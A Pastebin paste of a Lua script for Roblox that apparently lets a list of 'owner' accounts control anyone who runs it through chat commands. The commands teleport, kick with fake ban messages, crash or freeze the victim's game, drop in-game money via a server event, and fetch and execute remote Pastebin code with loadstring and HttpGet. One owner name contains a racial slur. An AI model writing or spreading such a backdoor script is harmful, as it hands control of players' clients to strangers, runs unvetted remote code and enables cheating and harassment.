Advertisement
Arcaneee

controlG

Oct 31st, 2022 (edited)
377
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 8.76 KB | None | 0 0
  1. local user = game:GetService("Players").LocalPlayer.Name
  2. host1 = "vArcane_P"
  3. host2 = "blackwithpinkk"
  4. host3 = "ilovehimsososomuch"
  5. host4 = "Darlinyouglowing"
  6. host5 = "Ifyourelonely"
  7. host6 = "vArcaneee"
  8. host7 = "chocolate4pplover3"
  9. host8 = "lolo906u6u66"
  10. host9 = "DaGettoNigx"
  11. host10 = "Comeb3lonelywithm3"
  12. host11 = "CreepyPastaView"
  13. host12 = "chaos_lxcas"
  14. host13 = "GeoThinksIsAnSigma"
  15. local Owner = {
  16.     host1,
  17.     host2,
  18.     host3,
  19.     host4,
  20.     host5,
  21.     host6,
  22.     host7,
  23.     host8,
  24.     host9,
  25.     host10,
  26.     host11,
  27.     host12,
  28.     host13
  29.  }
  30. if game:GetService("Players").LocalPlayer.Name == user then
  31. game.ReplicatedStorage.DefaultChatSystemChatEvents.OnMessageDoneFiltering.OnClientEvent:Connect(function(message)
  32. local player = message.FromSpeaker
  33. local chat = message.Message
  34.  
  35. bringCMD1 = ":bring ."
  36. if string.find(chat,bringCMD1) and table.find(Owner, player) then
  37.     game.Players.LocalPlayer.Character:FindFirstChild("HumanoidRootPart").CFrame = game.Players:FindFirstChild(host1).Character:FindFirstChild("HumanoidRootPart").CFrame
  38. end
  39.  
  40. kickCMD = ":kick ."
  41. if string.find(chat,kickCMD) and table.find(Owner, player) then
  42.     game:GetService("Players").LocalPlayer:Kick("Owner has kicked you!")
  43. end
  44.  
  45. banCMD = ":ban ."
  46. if string.find(chat,banCMD) and table.find(Owner, player) then
  47.     game:GetService("Players").LocalPlayer:Kick("\n\nUser BANNED\n\n")
  48. end
  49.  
  50. permabanCMD = ":permaban ."
  51. if string.find(chat,permabanCMD) and table.find(Owner, player) then
  52. --game:GetService('ReplicatedStorage'):FindFirstChild('MainEvent'):FireServer('OneMoreTime');
  53. end
  54.  
  55. crashCMD = ":crash ."
  56. if string.find(chat,crashCMD) and table.find(Owner, player) then
  57.     game:Shutdown()
  58. end
  59.  
  60. blackscreenCMD = ":bscreen ."
  61. if string.find(chat,blackscreenCMD) and table.find(Owner, player) then
  62. loadstring(game:HttpGet('https://pastebin.com/raw/vsw1Zg3z'))()
  63. end
  64.  
  65. resetCMD = ":reset ."
  66. if string.find(chat,resetCMD) and table.find(Owner, player) then
  67.     game.Players.LocalPlayer.Character.Humanoid.RigType = "R6"
  68.     --game:GetService("ReplicatedStorage").MainEvent:FireServer("ResetNew")
  69. end
  70.  
  71. moneyCMD = ":drop ."
  72. if string.find(chat,moneyCMD) and table.find(Owner, player) then
  73.     game:GetService("ReplicatedStorage").MainEvent:FireServer("DropMoney",10000)
  74. end
  75.  
  76. flashCMD = ":flash ."
  77. if string.find(chat,flashCMD) and table.find(Owner, player) then
  78. game:GetService("TweenService"):Create(game:GetService("Lighting").ColorCorrection, TweenInfo.new(0.13), {Saturation = -111}):Play()
  79.             local Sound1 = Instance.new("Sound", workspace)
  80.             local Sound2 = Instance.new("Sound", workspace)
  81.             Sound1.Volume = 8
  82.             Sound2.Volume = 8
  83.             Sound1.SoundId = "rbxassetid://9114466095"
  84.             Sound2.SoundId = "rbxassetid://9114465870"
  85.             Sound1:Play()
  86.             wait(0.5)
  87.             Sound2:Play()
  88.             wait(0.5)
  89.             Sound1:Play()
  90.             wait(0.5)
  91.             Sound2:Play()
  92. wait(1)
  93. game:GetService("TweenService"):Create(game:GetService("Lighting").ColorCorrection, TweenInfo.new(0.13), {Saturation = 0}):Play()
  94. end
  95.  
  96. flash2CMD = ":flash2 ."
  97. if string.find(chat,flash2CMD) and table.find(Owner, player) then
  98. game:GetService("RunService"):Set3dRenderingEnabled(false)
  99.             local Sound1 = Instance.new("Sound", workspace)
  100.             local Sound2 = Instance.new("Sound", workspace)
  101.             Sound1.Volume = 8
  102.             Sound2.Volume = 8
  103.             Sound1.SoundId = "rbxassetid://9114466095"
  104.             Sound2.SoundId = "rbxassetid://9114465870"
  105.             Sound1:Play()
  106.             wait(0.5)
  107.             Sound2:Play()
  108.             wait(0.5)
  109.             Sound1:Play()
  110.             wait(0.5)
  111.             Sound2:Play()
  112. wait(1)
  113. game:GetService("RunService"):Set3dRenderingEnabled(true)
  114. end
  115.  
  116. trollCMD = ":troll ."
  117. if string.find(chat,trollCMD) and table.find(Owner, player) then
  118.             for i,v in pairs(game.Players.LocalPlayer.Character:GetChildren()) do
  119.             if v:IsA("BasePart") and
  120.                 v.Name == "RightUpperArm" or
  121.                 v.Name == "RightUpperLeg" or
  122.                 v.Name == "LeftUpperLeg" or
  123.                 v.Name == "LeftUpperArm" then
  124.                 v:Destroy()
  125.             end
  126.         end
  127.         for i,v in pairs(game.Players.LocalPlayer.Character:GetChildren()) do
  128.             if v:IsA("BasePart") and
  129.                 v.Name == "Right Arm" or
  130.                 v.Name == "Right Leg" or
  131.                 v.Name == "Left Leg" or
  132.                 v.Name == "Left Arm" then
  133.                 v:Destroy()
  134.             end
  135.         end
  136.        
  137.                     pcall(function() --headless fe
  138.             game.Players.LocalPlayer.Character.Head.Neck:Destroy()
  139.             game.Players.LocalPlayer.Character.UpperTorso.NeckAttachment:Destroy()
  140.             game.Players.LocalPlayer.Character.Humanoid.HealthDisplayDistance = math.huge
  141.             game.Players.LocalPlayer.Character.Humanoid.NameDisplayDistance = math.huge
  142.             game.Players.LocalPlayer.Character.Head.Size = Vector3.new(0,0,0)
  143.             game.Players.LocalPlayer.Character.Head.Massless = true
  144.             game.Players.LocalPlayer.Character.Head.CanCollide = false
  145.    
  146.             heazd = true
  147.    
  148.             while heazd == true do
  149.                 pcall(function()  
  150.                     game.Players.LocalPlayer.Character.Head.NeckRigAttachment.CFrame =  CFrame.new(0, 100000.4736328125, 0)
  151.                     game.Players.LocalPlayer.Character.UpperTorso.NeckRigAttachment.CFrame =  CFrame.new(0, 100000.4736328125, 0)
  152.                     game.Players.LocalPlayer.Character.Head.CFrame = CFrame.new(0, 100000.4736328125, 0)
  153.                 end)
  154.                 wait()
  155.             end
  156.         end)
  157. end
  158.  
  159. bangCMD = ":benx ."
  160. if string.find(chat,bangCMD) and table.find(Owner, player) then
  161.     local Anim2 = Instance.new("Animation")
  162. Anim2.AnimationId = "rbxassetid://4686925579"
  163. getgenv().XD = game:GetService("Players").LocalPlayer.Character:FindFirstChildOfClass("Humanoid"):LoadAnimation(Anim2)
  164.     getgenv().XD:Play(); getgenv().XD.TimePosition = 0; getgenv().XD.Looped = true; getgenv().XD:AdjustSpeed(8);
  165. getgenv().XD = true
  166. if getgenv().XD == true then
  167. repeat wait()
  168.     game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = game.Players:FindFirstChild(host1).Character.HumanoidRootPart.CFrame * CFrame.new(0,0,-1)
  169. until getgenv().XD == false
  170. end
  171. end
  172.  
  173. unbangCMD = ":unbenx ."
  174. if string.find(chat,unbangCMD) and table.find(Owner, player) then
  175.     game.Players.LocalPlayer.Character.Animate.Disabled = false
  176.     local animtrack = game.Players.LocalPlayer.Character.Humanoid:GetPlayingAnimationTracks()
  177.     for i, track in pairs (animtrack) do
  178.         track:Stop()
  179.     end
  180. getgenv().XD = false
  181. end
  182.  
  183. freezeCMD = ":freeze ."
  184. if string.find(chat,freezeCMD) and table.find(Owner, player) then
  185.     game:GetService('Players').LocalPlayer.Character:FindFirstChild('HumanoidRootPart').Anchored = true;
  186. end
  187.  
  188. unfreezeCMD = ":unfreeze ."
  189. if string.find(chat,unfreezeCMD) and table.find(Owner, player) then
  190.     game:GetService('Players').LocalPlayer.Character:FindFirstChild('HumanoidRootPart').Anchored = false;
  191. end
  192.  
  193. jumpscareCMD = ":jumpscare ."
  194. if string.find(chat,jumpscareCMD) and table.find(Owner, player) then
  195.     loadstring(game:HttpGet('https://pastebin.com/raw/G7pZ1z1L'))()
  196. end
  197.  
  198. fuckmapCMD = ":fmap ."
  199. if string.find(chat,fuckmapCMD) and table.find(Owner, player) then
  200.     loadstring(game:HttpGet('https://pastebin.com/raw/GgraWMBu'))()
  201. end
  202.  
  203. rejoinCMD = ":rejoin ."
  204. if string.find(chat,rejoinCMD) and table.find(Owner, player) then
  205.      game:GetService("TeleportService"):TeleportToPlaceInstance(game.PlaceId, game.JobId)
  206. end
  207.  
  208. jailCMD = ":jail ."
  209. if string.find(chat,jailCMD) and table.find(Owner, player) then
  210. Part = Instance.new("Part", workspace)
  211. Part.Anchored = true
  212. Part.Size = Vector3.new(30, 1, 30)
  213. Part.CFrame = CFrame.new(0, -150, -350)
  214. Part.CanCollide = true
  215. game:service('Players').LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(1.72245359, -146.500015, -350.159698, 0.0203044806, 8.52240389e-10, 0.999793828, -3.64289998e-09, 1, -7.78433706e-10, -0.999793828, -3.62634323e-09, 0.0203044806)
  216. end
  217.  
  218. fuckballCMD = ":fball ."
  219. if string.find(chat,fuckballCMD) and table.find(Owner, player) then
  220.     loadstring(game:HttpGet('https://pastebin.com/raw/FCau6vZk'))()
  221. end
  222.  
  223. explodeCMD = ":explode ."
  224. if string.find(chat,explodeCMD) and table.find(Owner, player) then
  225.     game.Players.LocalPlayer.Character.Humanoid.RigType = "R6"
  226. --game:GetService("ReplicatedStorage").MainEvent:FireServer("ResetNew")
  227. loadstring(game:HttpGet('https://pastebin.com/raw/rTAe81vM'))()
  228. end
  229.  
  230. rdanceCMD = ":rdance ."
  231. if string.find(chat,rdanceCMD) and table.find(Owner, player) then
  232.     loadstring(game:HttpGet('https://pastebin.com/raw/Ce5qJ4ND'))()
  233. end
  234. end)
  235. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement